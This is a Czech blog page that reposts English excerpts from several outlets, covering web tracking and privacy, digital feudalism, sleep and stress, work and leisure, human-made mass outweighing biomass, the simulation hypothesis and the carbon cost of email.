Zobrazují se příspěvky se štítkemCan you read?. Zobrazit všechny příspěvky
Zobrazují se příspěvky se štítkemCan you read?. Zobrazit všechny příspěvky

pondělí 4. ledna 2021

Privacy Cost of a “Free” Website

Among them were the marketing and advertising arms of Google, Amazon, and Oracle’s BlueKai consumer data division, which reported a massive data exposure this summer, leaving billions of records—including personally identifiable information—accessible to the open internet without a password.

Zajac was floored when The Markup showed her how many trackers appeared on the site. She said she learned a hard lesson: “If it’s free, that doesn’t mean it’s free. It just means it doesn’t cost money.” Instead, it costs your website visitors’ privacy.  

Website operators may agree to set cookies—small strings of text that identify you—from one outside company. But they are not always aware that the code setting those cookies can also load dozens of other trackers along with them, like nesting dolls, each collecting user data.

We scanned more than 80,000 of the world’s most popular websites with Blacklight and found more than 5,000 were “fingerprinting” users, identifying them even if they block third-party cookies.
We also found more than 12,000 websites loaded scripts that watch and record all user interactions on a page—including scrolls and mouse movements. It’s called “session recording” and we found a higher prevalence of it than researchers had documented before.
More than 200 popular websites used a particularly invasive technique that captures personal information people enter on forms—like names, phone numbers, and passwords—before they hit send. It’s called “key logging” and it’s sometimes done as part of session recording.

The use of cookies by websites is well known, and most Americans understand how they work. But even some website operators don’t always know how they get there: often from free plug-ins like comments sections, social media sharing buttons, and tools that embed posts from social media—conveniences people have come to expect on the internet but that small website operators don’t have the resources to build themselves.

Marketing and advertising companies are happy to provide these tools for free in exchange for user data, which is used to construct ever-more-refined profiles of internet users.

Google Analytics trackers loaded on 69 percent of 80,000 popular websites scanned with Blacklight. Google Analytics gives website operators insight into how many people visit a website and which pages. The catch: Google, the world’s largest digital ad seller, also gets the data. The company’s cookie policy allows it to connect that data to the advertising profiles it already has on people, but Google spokesperson Elijah Lawal said it doesn’t do it as a policy unless the website operators agree.
However, in order for website operators to get information from Google Analytics about the demographics of their visitors, they have to allow data collection by Google’s advertising arm, DoubleClick, which adds the information to user profiles.

The second most common tracker we found on popular sites: Facebook. Blacklight found its pixel on a third of popular sites we scanned. Facebook’s trackers can follow you even if you’re not logged in to Facebook and link your browsing history to your profile for ad targeting. Website operators include the pixel to measure clicks from their ads on Facebook’s platforms.






The Markup

úterý 29. prosince 2020

In 2029, the Internet Will Make Us Act Like Medieval Peasants

In my own daily life, I already engage constantly with magical forces both sinister and benevolent. I scry through crystal my enemies’ movements from afar. (That is, I hate-follow people on Instagram.) I read stories about cursed symbols so powerful they render incommunicative anyone who gazes upon them. (That is, Unicode glyphs that crash your iPhone.) I refuse to write the names of mythical foes for fear of bidding them to my presence, the way proto-Germanic tribespeople used the euphemistic term brown for “bear” to avoid summoning one. (That is, I intentionally obfuscate words like Gamergate when writing them on Twitter.) I perform superstitious rituals to win the approval of demons. (That is, well, daemons, the autonomous background programs on which modern computing is built.)

This strange dance of ritual and superstition will become only more pronounced over the next decade. Thanks to ubiquitous smartphones and cellular data, the internet has developed into a kind of supernatural layer set atop everyday life, an easily accessible realm of fearsome power, feverish visions, and apocalyptic spiritual battle. The medievalist Richard Wunderli has described the world of 15th-century peasants as “enchanted” — “bounded by a mere translucent, porous barrier that led to the more powerful realm of spirits, devils, angels, and saints,” which doesn’t sound altogether different from a world in which a literally translucent barrier separates me from trolls and daemons and pop-star icons into whose Twitter mentions and Instagram comments I might make quasi-religious pilgrimage.

The structure of the internet is headed toward an arrangement the cybersecurity expert Bruce Schneier calls “digital feudalism,” through which the great landlords, platforms like Google and Facebook, “are becoming our feudal lords, and we are becoming their vassals.” We will provide them with the data-fruits of our browsing, in a nominal exchange for vague assurances of their protection from data-breach marauders. The sense of powerlessness you might already feel in the face of a megaplatform’s opaque algorithmic justice — and the sense of mystery such workings might engender — would not have seemed so strange to a medieval peasant. (Once you explained, you know, what an algorithm is.)

And as the internet bewitches more everyday objects — smart TVs, smart ovens, smart speakers, smart vibrators — its feudal logic will seize the material world as well. You don’t “own” the software on your phone any more than a peasant owned his allotment, and when your car and your front-door lock are similarly enchanted, you can imagine a distant lord easily and arbitrarily evicting you — with the faceless customer-service bots to whom you’d plead your case being as pitiless and unforgiving as a medieval sheriff. The Financial Times’ Izabella Kaminska suggests that, within the “frightfully medieval problem” of the sharing economy’s quasi-feudal control of its contractors, there’s “potential for the return of the guild structure”: Rideshare drivers, for example, might someday create an independent credentialing body to ensure portability of data and reputation across the “borders” of “landholders” (that is, Uber and Lyft), just as craftsmen might have used a guild membership to demonstrate their credentials early in the last millennium.

Where would this feudally arranged, spiritually charged layer of magic take our politics and culture? We could look to our president, who wields power like an absolutist king or a dodgy pope and who speaks, as many observers have noted, like a Greek hero or an Anglo-Saxon warlord — that is, in the braggadocious, highly repetitive style of the epic poetry characteristic of oral cultures.

Paradoxically, the ephemerality — and sheer volume — of text on social media is re-creating the circumstances of a preliterate society: a world in which information is quickly forgotten and nothing can be easily looked up. (Like Irish monks copying out Aristotle, Google and Facebook will collect and sort the world’s knowledge; like the medieval Catholic church, they’ll rigorously control its presentation and accessibility.) Under these conditions, memorability and concision — you know, the same qualities you might say make someone good at Twitter — will be more highly prized than strength of argument, and effective political leaders, for whom the factual truth is less important than the perpetual reinscription of a durable myth, will focus on repetitive self-aggrandizement.






By Max Read
article appears in the November 11, 2019, issue of New York Magazine

pondělí 21. prosince 2020

Your Sleep Tonight Changes How You React to Stress Tomorrow

When participants got more sleep, they had higher levels of positive emotions and lower levels of negative emotions the next day. Moreover, sleep impacted how the events of the day affected them. On days when participants had a stressful event, their positive emotions took less of a hit if they’d gotten a good night’s sleep beforehand. And, on days when good things happened, participants experienced an even greater boost in positive emotions if they were well-rested. These benefits were even more pronounced for people who had a greater number of chronic health conditions, such as allergies, high blood pressure, or diabetes.

Sleep has many wide-ranging effects on our lives. For example, past research has found that sleep deprivation is a risk factor for developing chronic health issues. And its impact on positive emotions could partly help explain this, since positive emotions seem to reduce our inflammation and protect our health. In other words, sleep’s effect on our moods could even translate to better or worse health over time.

In addition to health, sleep deprivation can also impact our relationships with others—in two ways, says Nancy Sin, assistant professor at the University of British Columbia and lead author of the paper. First, the irritability you feel when sleep-deprived can harm relationships directly (which might be a reason to postpone serious conversations to a day when you’re more well-rested). Additionally, because positive emotions play a crucial role in building relationships, not experiencing as many positive emotions when you’re sleep-deprived could make it harder to cultivate a sense of closeness with others.

However, the good news is that simple changes to our routines can help improve sleep. Things like keeping a regular schedule, exercising, and limiting unnecessary light and noise in your bedroom can all help promote sleep.

One major recommendation Sin offers is to limit screen time before bed; research suggests that electronics can emit blue light that interferes with sleep. If you often find yourself “doomscrolling” on social media during late-night hours, consider setting a time to turn off screens and switch to a more relaxing activity (like reading or listening to calming music).

For those who live with family or roommates, Sin emphasizes that getting a good night’s sleep isn’t solely an individual effort: The behaviors of those we live with can disrupt our sleep. So, for example, consider making a pact with household members to limit screen time, and holding each other accountable.

The flip side is that improving sleep has the potential to help us cope more effectively with the stresses we’re facing right now. As Sin explains, “Maintaining good sleep is one of these critical aspects of staying healthy emotionally and psychologically during this time.”






Greater Good Magazine

How Civilization Broke Our Brains

Several months ago, I got into a long discussion with a colleague about the origins of the “Sunday scaries,” the flood of anxiety that many of us feel as the weekend is winding down and the workweek approaches. He said that the culprit was clear, and pointed to late-stage capitalism’s corrosive blend of performance stress and job insecurity. But capitalism also exists Monday through Saturday, so why should Sunday be so uniquely anxiety-inducing?

The deeper cause, I thought, might have something to do with the modern psychology of time. Imagine the 21st-century worker as accessing two modes of thinking: productivity mind and leisure mind. When we are under the sway of the former, we are time- and results-optimizing creatures, set on proving our industriousness to the world and, most of all, to ourselves. In leisure mode, the thrumming subsides, allowing us to watch a movie or finish a glass of wine without considering how our behavior might affect our reputation and performance reviews. For several hours a week, on Sunday evening, a psychological tug-of-war between these perspectives takes place. Guilt about recent lethargy kicks in as productivity mind gears up, and apprehension about workaday pressure builds as leisure mind cedes power.

If only we could navigate our divided lives with seamless ease—except what if ease isn’t what most of us really want? In 2012, the University of Maryland sociologist John P. Robinson reviewed more than 40 years of happiness and time-use surveys that asked Americans how often they felt they either were “rushed” or had “excess time.” Perhaps predictably, he concluded that the happiest people were the “never-never” group—those who said they very rarely felt hurried or bored, which isn’t to say they were laid-back. Their schedules met their energy level, and the work they did consumed their attention without exhausting it. In an essay for Scientific American summarizing his research, Robinson offered a strenuous formula for joy: “Happiness means being just rushed enough.”

Despite the headline focus on happiness, Robinson’s most unexpected insights were about American discontent. We may constantly complain about our harried schedules, but the real joy-killer seemed to be the absence of any schedule at all. Considerably less happy than the just-rushed-enough, he said, were those with lots of excess time. He found, as other workplace studies have shown, that Americans are surprisingly fretful when not absorbed by tasks, paid or otherwise. And at the bottom of his rankings, registering an “unparalleled level of unhappiness,” were those whose plight may sound puzzling: people who, though they almost always felt underscheduled, also almost always felt rushed. Such is the psychological misery of an undirected person for whom an urgent need to overcome idleness—to find purpose—becomes a source of stress. This always-always condition struck me as the most peculiarly modern anxiety: It’s the Sunday scaries, all week long.

This bizarre need to feel busy, or to feel that time is structured, even when one is sprawled on the couch on a weekend afternoon—where does it come from? Is it inscribed in our DNA, or is it as much an invention of industrialized culture as paper clips and microchips? To answer that question, we would have to understand the texture of human life for most of our history, before civilization and workweeks edged their way into the picture. We would need a participant-observer from our era to live among hunter-gatherers and experience their relationship to work, time, and joy.

The anthropologist James Suzman has done a version of that, devoting almost 30 years to studying the Ju/’hoansi “Bushmen,” a tribe whose members lived an isolated existence in Namibia and Botswana until the late 20th century, when incursions by local governments destroyed their way of life. In his new book, Work: A Deep History, From the Stone Age to the Age of Robots,* Suzman describes the Ju/’hoansi of yore as healthy and cheerful, perfectly content to work as little as possible and—not coincidentally—ingenious at designing customs that discourage competition and status-seeking. Combining careful anthropological research with excursions into sociology and psychology, he asks how we’ve come to find ourselves more harried—and seemingly more unhappy—than the small-scale communities from which civilization emerged. If there is some better way of handling modernity’s promises and pressures, perhaps the Ju/’hoansi can light the way.

Work, Suzman Observes, is what distinguishes animate organisms, humans above all, from inert matter: “Only living things actively seek out and capture energy specifically to live, to grow and to reproduce.” Yet it is the million-year history of labor’s counterpoint, leisure, that holds the key to humanity’s exceptionalism—its record of remarkable progress, and the discontent that seems to have accompanied those strides.

From what we can tell, our Australopithecus ancestors of roughly 2.5 million years ago closely resembled modern primates, such as chimpanzees, who spend about eight hours a day foraging and eating. In between chewing and digesting all that raw pith, stalk, and root, gorillas and chimps sleep nine to 12 hours. Such a routine doesn’t leave much daylight time for leisure activities more energy-intensive than lazy grooming.

Fire changed everything. Anthropologists don’t know precisely how humans first marshaled fire for their use roughly 1 million years ago, but it’s obvious how fire formed humans. By softening meat and vegetables, fire predigests our food, allowing us to eat and retain more calories in less time. By warding off predators, fire allowed our ancestors to climb down from their tree beds and sleep soundly on the ground; more REM sleep sharpened their memory and their focus. Fire also allowed humans to grow huge, energy-greedy brains that gobble up about a fifth of our calories, a far greater proportion than other primates’ brains consume.

By expanding our minds and our free time, fire sparked humankind’s capacity for boredom, amusement, craftsmanship, and art. And from what we can discern, our Homo sapiens ancestors celebrated the gift of free time with gusto.

The Ju/’hoansi spent an average of 17 hours a week finding food—2,140 calories daily—and devoted another 20 to chores, as Suzman gleaned from other ethnographies and firsthand research. This left them with considerably more downtime than the typical full-time employee in the U.S., who spends about 44 hours a week doing work—and that doesn’t include domestic labor and child care. In that downtime, the Ju/’hoansi remained strikingly free, over centuries, from the urge to cram it with activities that we would classify as “productive” (or, for that matter, destructive). By day, they did go on walks with children to teach them how to read the canvas of the desert for the footprints of animals. But they also lounged, gossiped, and flirted. During firelit evenings, they sang, danced, and told stories. One anthropologist studying another hunter-gatherer tribe, the Hadza people of northern Tanzania, described its members in the 1960s as habitual small-stakes gamblers whose days were filled with one particular pastime: winning and losing arrows in games of chance.

So how did we move from that world to a culture in which leisure exists for the sake of work—in which downtime activities (such as using social media) are strewed with performance metrics, and childhood play (such as team sports) has become a résumé enhancer? Suzman does not answer this question in a very organized way. But his discussion highlights at a macro level what the Sunday scaries signal on a personal level: Modern life has made it harder for Americans to forget about their work.

Suzman calls attention to the changing nature of work. He draws on the writing of the French sociologist Émile Durkheim, who pointed to a crucial difference between “primitive” and complex societies called interchangeability. For hunter-gatherers, chiefs and shamans could, and did, moonlight as foragers and hunters. Overlapping duties preserved a strong sense of community, reinforced by customs and religions that obscured individual differences in strength, skill, and ambition. Shared labor meant shared values.

But in industrial economies, lawyers don’t tag in for brain surgery, and drill sergeants don’t harvest wheat—and the different jobs people do, requiring different skill sets, command (often vastly) different pay. As specialization spread and superior performance was rewarded, a cult of competition emerged: High achievers believed they could and should always toil harder for a fatter raise, bigger house, higher honor, or more wondrous breakthrough. Where rest once beckoned, now restlessness did. The productivity mode thrived—and it just might deserve credit (along with luck) for almost all scientific progress and technological ingenuity. But it also bears the blame for what Durkheim called a “malady of infinite aspiration,” which by now we’ve discovered is chronic. When a recent Pew Research Center survey asked about the secret to happiness, most Americans, of all ages, ranked “a job or career they enjoy” above marriage, children, or any other committed relationship. Careerism, not community, is the keystone in the arch of life.

You might say that leisure mind never had a chance. But Suzman emphasizes another fundamental change to help account for that: our relationship to time—specifically, to the future. Small hunter-gatherer groups in tropical climates rarely stored food for more than a few days, Suzman writes. Trusting in the abundance of their environment, the Ju/’hoansi worked to meet their absolute needs, and then stopped to rest, rather than planning ahead.

By comparison, modern civilization is a shrine to the future. The shift goes back to the agricultural revolution, which subjected humans to farming cycles that separated planting and harvest by many months, and continued with the rise of finance. But a fixation on the future by now goes far beyond crop cycles and long-term loans. It is at the heart of our concept of education and corporate development, which presumes that young students and workers will gladly spend decades honing skills that they will be well compensated for only years later. The least controversial values in America today—the importance of grit, the hope for progress, the dream of social mobility—assume that the future is always changing and that our inclination is always to wish for better. Meanwhile, excessively negative future-oriented thinking is the most common feature of anxiety disorders, which afflict almost 20 percent of Americans.

At the aggregate level, high expectations for the future have surely made the world a better place. Despite routine complaining from the 21st century’s inhabitants, modern civilization has produced quite a lot to be thankful for. Slow cookers, Venmo, and internet kittens; vaccines and aspirin, heat lamps and mittens; Amazon, hand soap, air-conditioning—these are a few of my favorite things, at least. But at the individual level, Suzman offers the tantalizing promise that the Ju/’hoansi have something to teach those of us whose brains have been dizzied by the vertigo of civilization.

Even the present-oriented hunter-gatherers, it turns out, had to develop communal strategies to quash the drivers of overwork—status envy, inequality, deprivation. When a Ju/’hoan hunter returned with a big kill, the tribe perceived a danger that he might think his prowess elevated him above others. “We can’t accept this,” one tribesman said. “So we always speak of his meat as worthless. This way we cool his heart and make him gentle.” This practice became known among researchers as “insulting the hunter’s meat.”

It was not the only custom that aimed to discourage a destabilizing competition for status and avoid a concentration of power. The tribe also “insisted that the actual owner of the meat, the individual charged with its distribution, was not the hunter, but the person who owned the arrow that killed the animal,” Suzman writes. By rewarding the semi-random contributor of the arrow, the Ju/’hoansi kept their most talented hunters in check, in order to defend the group’s egalitarianism. A welcome result was that “the elderly, the short-sighted, the clubfooted and the lazy got a chance to be the centre of attention once in a while.”

Reading about these strategies, I felt several things at once—astonished by their ingenuity, mind-blown by the notion of ridiculing exceptional achievements, and worried that my failure to imagine taking comparable pains to protect leisurely harmony meant that my own brain had been addled by too many years in productivity mode, too many twitchy Sunday evenings. But what Suzman’s foray into humanity’s past reveals is that leisure has never been the ready default mode we may imagine, even in the chillest of cultures. The psychological cost of civilization, the scourge of the Sunday scaries, and the lesson of the Ju/’hoansi converge in an insight worth taking to heart: Safeguarding leisure is work. While progress depends on pinning our hopes on a world that doesn’t yet exist, those who cannot stop planning for the future are doomed to labor for a life they will never fully live.






The version of this article used an incorrect subtitle for the American edition of James Suzman’s book. The full title of that edition is Work: A Deep History, From the Stone Age to the Age of Robot.

in the January/February 2021 print edition The Atlantic

čtvrtek 17. prosince 2020

All the Stuff Humans Make Now Outweighs Earth’s Organisms

When not busy trying to murder humans in The Matrix, the AI program known as Agent Smith took time to pontificare on our nature as a species. You can’t really consider us mammals, he reckoned, because mammals form an equilibrium with their environment. By contrast, humans move to an area and multiply “until every natural resource is consumed,” making us more like a kind of virus. “Human beings are a disease,” he concluded, “a cancer of this planet. You are a plague.”

I think, though, that it would be more accurate to describe humanity as a kind of biofilm, a bacterium or fungus that’s grown as a blanket across the planet, hoovering up its resources. We plop down great cities of concrete and connect them with vast networks of highways. We level forests for timber to build homes. We turn natural materials like sand into cement and glass, and oil into asphalt, and iron into steel. In this reengineering of Earth, we’ve imperiled countless species, many of which will have gone extinct without science ever describing them.

Collectively, these manufactured products of humanity are known as anthropogenic mass. And according to a new paper in the journal Nature, at around 1.1 teratonnes (or 1,100,000,000,000 metric tons), anthropogenic mass now outweighs Earth’s dry biomass. That means all the living organisms, including vegetation, animals, and microbes. More incredible still, at the start of the 20th century, our anthropogenic mass tallied up to only 3 percent of the planet’s biomass but has over the past 100 years grown at an astonishing rate: Annual production now sits at 30 gigatonnes, or 30,000,000,000 metric tons. At this rate, in just 20 more years, anthropogenic mass will go from currently weighing slightly more than total dry biomass to nearly tripling it.



How on earth did this happen? “It's a combination of both population growth and the rise in consumption and in development,” says environmental scientist Emily Elhacham of Israel’s Weizmann Institute of Science, lead author on the paper. “We see that the majority is construction material.”

Take a look at the graph below. You can see that such construction materials, like concrete and aggregates like gravel, exploded in abundance after World War II, and make up the vast majority of total anthropogenic mass. (These are global figures.) As the human population has grown, so has its demand for infrastructure like roads. The world has urbanized, too, requiring more materials for buildings. And as more people around the world ascend into the middle class, they splurge on goods, from smartphones to cars. Our plastic—both what’s in use and what we’ve wasted, also taking into account recycling—alone weighs 8 gigatonnes, twice the weight of all the animals of Earth put together.



To quantify all this stuff, the team scoured existing literature, aggregating previously available data sets covering the extraction of resources, industrial production, and waste and recycling. “It turns out that things that humans produce—in our industries, etc.—is something that has been relatively well characterized,” says Weizmann Institute of Science systems biologist Ron Milo, coauthor on the paper.

Quantifying the biomass of all the organisms on Earth was trickier, on account of the planet not keeping good records of exactly how much life is out there. The researchers had to tally everything from giant species like the blue whale all the way down to the microbes that blanket the land and swirl in the oceans. “The biggest uncertainties, actually, in the overall biomass, is in respect mostly to plants, mostly trees,” Milo adds. “It's not easy to estimate the overall mass of roots, shoots, leaves.” But here, too, Milo and his colleagues could pull from previous estimates of biomass up and down the tree of life and incorporate data from satellite monitoring of landscapes to get an idea of how much vegetation is out there.

They also considered the change in biomass over time. For instance, they note that since the first agricultural revolution, humanity has been responsible for cutting plant biomass in half, from 2 teratonnes to one. At the same time—particularly over the past 100 years—people have been creating ever more anthropogenic mass. Not only has production been increasing exponentially, but as that stuff reaches the end of its usefulness it’s simply discarded if it isn’t recyclable.

In other words, all that crap is piling up while humanity continues to obliterate natural biomass, to the point where the mass of each is now about equal. “They produce this, I think, very eye-catching and also strong message that these two types of stocks—the biomass stock and anthropogenic mass—they are actually at a crossover point more or less in 2020, plus or minus a couple of years,” says social ecologist Fridolin Krausmann of the University of Natural Resources and Life Sciences, Vienna, who wasn’t involved in the research but was a peer reviewer for the paper.

The two stocks turn out to be intimately intertwined. The relentless destruction of biomass is largely a consequence of deforestation in pursuit of industrialization and development. But our built environment is also generally awful for wildlife: Highways slice ecosystems in half, birds fly into buildings, sprawling developments fester like scars on the landscape.

The buildup of anthropogenic mass is also linked to the climate crisis. The production of materials is extremely energy-intensive, for one. In the case of cement production, that climate effect comes from powering the manufacturing process and also from the chemical reactions in the forming material that spew carbon dioxide. If the cement industry were a country, according to the climate change website Carbon Brief , it’d be the world’s third most prolific emitter.

As economies the world over continue to grow, humanity has locked itself into a vicious cycle of snowballing the growth of anthropogenic mass. “On the one hand, economic growth drives the accumulation of this mass,” says Krausmann. “And on the other hand, the accumulation of this mass is a major driver of economic development.” China has been a particularly big contributor as of late, Krausmann adds, as the nation has rapidly and massively built up its infrastructure. Which is not to lay the blame on any one country—we’ve made this mess together as a species. And the modeling in the Nature paper was global, not on the scale of individual nations. “But I think it would be interesting to study that in the future, and really see those changes in different regions or in specific countries,” says Elhacham.

What’s abundantly clear at the moment is that anthropogenic mass has grown unchecked and become a nefarious crust over the planet. “This exponential growth of the anthropogenic mass cannot be sustainable,” says Krausmann, “even though we don't know exactly where the threshold might be.”









Wired

pondělí 30. listopadu 2020

Are we living in a computer simulation? I don’t know. Probably.

Are we living in a computer simulation?

The question seems absurd. Yet there are plenty of smart people who are convinced that this is not only possible but perhaps likely.

In an influential paper that laid out the theory, the Oxford philosopher Nick Bostrom showed that at least one of three possibilities is true: 1) All human-like civilizations in the universe go extinct before they develop the technological capacity to create simulated realities; 2) if any civilizations do reach this phase of technological maturity, none of them will bother to run simulations; or 3) advanced civilizations would have the ability to create many, many simulations, and that means there are far more simulated worlds than non-simulated ones.

We can’t know for sure which of these is the case, Bostrom concludes, but they’re all possible — and the third option might even be the most probable outcome. It’s a difficult argument to wrap your head around, but it makes a certain amount of sense.

Rizwan Virk, a computer scientist and video game designer, published a 2019 book, The Simulation Hypothesis, that explores Bostrom’s argument in much greater detail and traces the path from today’s technology to what he calls the “Simulation Point,” the moment at which we could realistically build a Matrix-like simulation.

I know nothing about computer science, but this idea that we’re all characters in an advanced civilization’s video game is, well, kind of awesome. So I reached out to Virk and asked him to break it down for me.

A lightly edited transcript of our conversation follows.

“Simulation Point,” the moment at which we could realistically build a Matrix-like simulation.

I know nothing about computer science, but this idea that we’re all characters in an advanced civilization’s video game is, well, kind of awesome. So I reached out to Virk and asked him to break it down for me.

A lightly edited transcript of our conversation follows.

Sean Illing
Pretend I know absolutely nothing about the “simulation hypothesis.” What the hell is the simulation hypothesis?

Rizwan Virk
The simulation hypothesis is the modern equivalent of an idea that’s been around for a while, and it is the idea that the physical world that we live in, including the Earth and the rest of the physical universe, is actually part of a computer simulation.

You can think of it like a high resolution or high-fidelity video game in which we are all characters, and the best way to understand it within Western culture is the movie The Matrix, which many people have seen, or even if they haven’t seen [it], it’s become a cultural phenomenon now beyond the film industry.

In that movie, Keanu Reeves plays the character Neo, who meets a guy names Morpheus, who is aptly named after the Greek god of dreams, and Morpheus gives him a choice of taking the red pill or the blue pill. And if he takes the red pill, he wakes up and realizes that his entire life, including his job, the building he lived in, and everything else, was part of this elaborate video game, and he wakes up in a world outside of the game.

That is the basic version of the simulation hypothesis.

Sean Illing
Are we living in a simulated universe right now?

Rizwan Virk
There are lots of mysteries in physics that are better explained by the simulation hypothesis than by what would be a material hypothesis.

The truth is that there’s much we simply don’t understand about our reality, and I think it’s more likely than not that we are in some kind of a simulated universe. Now, it’s a much more sophisticated video game than the games we produce, just like today World of Warcraft and Fortnite are way more sophisticated than Pac-Man or Space Invaders. They took a couple of decades of figuring out how to model physical objects using 3D models and then how to render them with limited computing power, which eventually led to this spate of shared online video games.

I think there’s a very good chance we are, in fact, living in a simulation, though we can’t say that with 100 percent confidence. But there is plenty of evidence that points in that direction.

Sean Illing
When you say there are aspects of our world that would make more sense if they were part of a simulation, what do you mean exactly?

Rizwan Virk
Well, there are a few different aspects, one of which is this mystery they call quantum indeterminacy, which is the idea that a particle is in one of multiple states and you don’t know that unless you observe the particle.

Probably a better way to understand it is the now-infamous example of Schrödinger’s cat, which is a cat that the physicist Erwin Schrödinger theorized would be in a box with some radioactive material and there was a 50 percent chance the cat is dead and a 50 percent chance the cat is alive.

Now, common sense would tell us that the cat is already either alive or it’s dead. We just don’t know because we haven’t looked in the box. We open the box and it’ll be revealed to us whether the cat is alive or dead. But quantum physics tells us that the cat is both alive and dead at the same time until somebody opens up the box to observe it. The cardinal rule is the universe renders only that which needs to be observed.

Sean Illing
How does Schrödinger’s cat relate to a video game or a computer simulation?

Rizwan Virk
The history of video game development is all about optimizing limited resources. If you asked somebody in the 1980s if you could you render a game like World of Warcraft, which is a full three-dimensional or a virtual reality game, they would say, “No, It would take all the computing power in the world. We couldn’t render all those pixels in real time.”

But what happened over time was that there were optimization techniques. The core of all these optimizations is “only render that which is being observed.”

The first big game to successfully do this was called Doom, which was very popular in the 1990s. It was a first-person shooter game, and it could render only the light rays and objects which are clearly visible from the point of view of the virtual camera. This is an optimization technique, and it’s one of the things that reminds me of a video game in the physical world.

Sean Illing
I’m going to do the thing that non-scientists always do when they want to sound scientific and invoke Occam’s razor. Isn’t the hypothesis that we’re living in a flesh-and-blood physical world the simpler — and therefore more likely — explanation?

Rizwan Virk
I’ll bring up a very famous physicist, John Wheeler. He was one of the last physicists who worked with Albert Einstein and many of the great physicists of the 20th century. He said that physics was initially thought to be about the study of physical objects, that everything was reducible to particles. This is what’s often called the Newtonian model. But then we discovered quantum physics and we realized that everything was a field of probabilities and it wasn’t actually physical objects. That was the second wave in Wheeler’s career.

The third wave in his career was the discovery that at the core level, everything is information, everything is based on bits. So Wheeler came up with a famous phrase called “it from bit,” which is the idea that anything we see as physical is really the result of bits of information. He didn’t live to see quantum computers come into reality, but it’s looking more like that.

So I would say that if the world isn’t really physical, if it’s based on information, then a simpler explanation might in fact be that we are in a simulation that is generated based on computer science and information.

Sean Illing
Is there any way, in principle, for us to prove definitively that we’re living in a simulation?

Rizwan Virk
Well, there’s an argument the Oxford philosopher Nick Bostrom has made that’s worth repeating. He says that if even one civilization got to the point of creating one of these high-fidelity simulations, then they can create literally billions of civilizations that are simulated, each with trillions of beings, because all you need is more computing power.

So he’s making a statistical argument that there are more likely to be more simulated beings than there are biological ones, just because it’s so quick and easy to create them. Therefore, if we are conscious beings, we are more likely to be a simulated being than a biological one. That’s more of a philosophical argument.

Sean Illing
If we were living in a computer program, I assume that program would consist of rules and that those rules could be broken or suspended by the people or beings who programmed the simulation. But the laws of our physical world seem to be pretty constant, so isn’t that a sign that this might not be a simulation?

Rizwan Virk
Computers do follow rules, but the fact that the rules always apply doesn’t rule in or rule out that we could be part of a computer simulation. One of the concepts that ties into this is a concept called computational irreducibility, and it’s the idea that in order to figure something out, you can’t just calculate it in an equation; you have to actually go through the steps to figure out what the end result would be.

And this is part of a branch of mathematics called chaos theory. There’s the old idea that the butterfly flaps its wings in China and it results in a hurricane somewhere else in the world. To figure that out, you have to actually go through and model every step of the way. Just because the rules seem to apply doesn’t mean that we’re not in a simulation.

In fact, it could be more evidence that we’re in a simulation.

Sean Illing
If we were living in a simulation as convincing as The Matrix, would there be any discernible difference between the simulation and reality? Why would it matter ultimately whether our world was real or illusory?

Rizwan Virk
There are a lot of debates around this topic. Some of us wouldn’t want to know, and would rather take the metaphorical “blue pill” like in The Matrix.

Probably the most important question related to this is whether we are NPCs (non-player characters) or PCs (player characters) in the video game. If we are PCs, then that means we are just playing a character inside the video game of life, which I call the Great Simulation. I think many of us would like to know this. We would want to know the parameters of the game we’re playing so that we could better understand it, better navigate it.

If we are NPCs, or simulated characters, then I think it’s a more complicated answer and more frightening. The question is, are all of us NPCs in a simulation, and what is the purpose of that simulation? A knowledge of the fact that we’re in a simulation, and the goals of the simulation and the goals of our character, I think, would still be interesting to many people — and now we’re back to the case of the holodeck character from Star Trek that discovers that there is a world “out there” (outside the holodeck) that he can’t go to, and perhaps some of us would rather not know in that case.

Sean Illing
How close are we to having the technological capacity to build an artificial world that’s as realistic and plausible as The Matrix?

Rizwan Virk
I lay out 10 stages of technology development that a civilization would have to go through to get to what I call the simulation point, which is the point at which we can create a hyperrealistic simulation like this. We’re at about stage five, which is around virtual reality and augmented reality. Stage six is about learning to render these things without us having to put on glasses, and the fact that 3D printers now can print 3D pixels of objects shows us that most objects can be broken down as information.

But the really difficult part — and this is something not a lot of technologists have talked about — is in The Matrix, the reason they thought they were fully immersed was they had this cord going into the cerebral cortex, and that’s where the signal was beamed. This brain-computer interface is the area that we haven’t yet made that much progress in, but we are making progress in it. It’s in the early stages.

So my guess is within a few decades to 100 years from now, we will reach the simulation point.





VOX

neděle 22. listopadu 2020

Can sending fewer emails really save the planet?

Are you the type of person who always says thank you? Well, if it's by email, you should stop, according to UK officials looking at ways to save the environment.

The Financial Times reports that we may all soon be encouraged to send one fewer email a day, cutting out "useless" one-line messages - such as "thanks".

Doing so "would save a lot of carbon", one official involved in next year's COP26 climate summit in Glasgow said.

But would it really make a huge difference?
Why do emails produce carbon at all?
Most people tend to think of the internet as a cloud that exists outside their computing hardware. But the reality is when you send an email - or anything else - it goes along a chain of energy-burning electronics.

Your wi-fi router sends the signal along wires to the local exchange - the green box on the street corner - and from there to a telecoms company, and from there to huge data centres operated by the tech giants. Each of those runs on electricity, and it all adds up.

But a single email's effect on such massive infrastructure is tiny.
Are my emails a big environmental problem?
The Financial Times report says the officials promoting this idea referred to a press release from renewable electricity firm Ovo Energy from one year ago.

It claimed that if every British person sent one fewer thank you email a day, it would save 16,433 tonnes of carbon a year, equivalent to tens of thousands of flights to Europe.

The problem, however, is that even if the sums involved roughly worked out, it would still be a splash in the pond.

The UK's annual greenhouse gas emissions were 435.2 million tonnes in 2019 - so the amount in question here is about 0.0037% of the national picture. And that's if every single British person reduced their email output.

Mike Berners-Lee, a respected professor on the topic whose research was used in the Ovo Energy work, told the Financial Times it was based on "back-of-the-envelope" maths from 2010 - and while useful to start conversations, there were bigger questions.

On top of that, the estimate of how much carbon an email generates "takes into account absolutely everything involved", according to Chris Preist, professor of sustainability and computer systems at the University of Bristol.

It tries to include the energy used by servers, your home wi-fi, your laptop - even a very small share of the carbon emitted to construct the data centre buildings.

"The reality is that a lot of the system will still have impact, whether or not the email is sent," Prof Preist explains.

"Your laptop will still be on, your wi-fi will still be on, your home internet connection will still be on, the wider network will still use roughly the same amount of energy even with a reduction in volume.

"There will be a small saving in the data centre hosting the email, particularly if it allows them to use a few less servers. But the carbon saved will be far far less than 1g per email."

What can make a difference?
Rather than worrying about relatively low-impact emails, some researchers suggest we should turn our attention to services such as game and video-streaming and cloud storage which have a much larger effect.

But the topic is immensely complicated, and there is a debate about how estimates should be calculated - and who should be responsible for it.
